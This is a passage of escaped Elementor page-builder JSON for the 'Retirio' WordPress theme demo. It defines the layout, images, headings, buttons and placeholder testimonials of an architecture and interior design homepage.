",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT INTERIOR\",\"title\":\"We provide the best\\narchitect & interior\\ndesign services\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Our signature design process comes standard\\u2026refresh, remodel, new and enjoyable design experience\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Detail\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"015c584\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"200\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"180\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"animation\":\"fadeInUp\",\"animation_tablet\":\"none\",\"animation_delay\":200},\"elements\":[{\"id\":\"f11899a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"b5b032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Trust the experts for all your <strong style=\\\"color: #242424;\\\">architects &amp; interior needs.<\\/strong><\\/p>\",\"text_color\":\"#9C9C9C\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"600\",\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"60\",\"bottom\":\"15\",\"left\":\"40\",\"isLinked\":false},\"_element_width\":\"auto\",\"_background_background\":\"classic\",\"_background_color\":\"#F5F5F5\",\"align_mobile\":\"center\",\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6c98d6d\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Service\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"40\",\"bottom\":\"25\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/services\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit 